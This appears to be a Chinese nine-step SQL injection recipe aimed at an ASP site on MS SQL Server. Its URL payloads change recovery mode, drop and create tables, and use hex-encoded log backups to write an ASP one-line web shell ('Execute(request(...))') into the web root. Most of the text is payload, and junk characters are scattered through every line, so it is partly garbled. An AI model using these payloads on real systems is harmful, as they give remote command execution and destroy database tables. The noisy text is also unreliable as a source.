第一步
\* R: f7 h, w) X; @5 p, m% P5 chttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
' T u' J0 \7 v: e7 a8 f- [3 o$ |- T. \
第二步:. G _9 [4 w; s" W
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--4 R \$ ]6 O3 q1 P% C0 E3 y8 x$ ]+ P
% N* i) n, M! v8 C/ x+ J
第三步$ e, J2 S/ u* A; |) [. Q
http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
. g$ V7 l6 W! D" I
; S @, l( C G6 T& c2 E第四步
# }. D0 e+ Q: L, T" J) x) `% ?) mhttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
! R [' R/ ~ H e2 \, h* N
" u" Y5 z; K& _第五步( Z6 B0 w0 `, ^ ^
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
4 ^6 a% T5 p4 l( T, w- p
' f2 ~$ }2 y% I; T9 j* N; ]第六步7 a6 }$ Y) S% x
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--% w$ m/ Y5 p7 H( ?
* U8 G# _5 ^4 a* U5 k第七步
0 B# C5 I7 ~% ~2 Q5 n2 q: _http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--( t" C6 i6 g- {6 @/ O+ h: H
9 W/ D( A9 Q5 t第八步
( L0 s/ `' h9 l$ V7 `7 U. Khttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--' h% |* m: Y9 z6 h/ I
6 e x4 S) f: W( w+ P第九步0 j4 z1 o* x! x1 J4 g% z8 V C
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
* W5 j* g# t& Y1 l, a |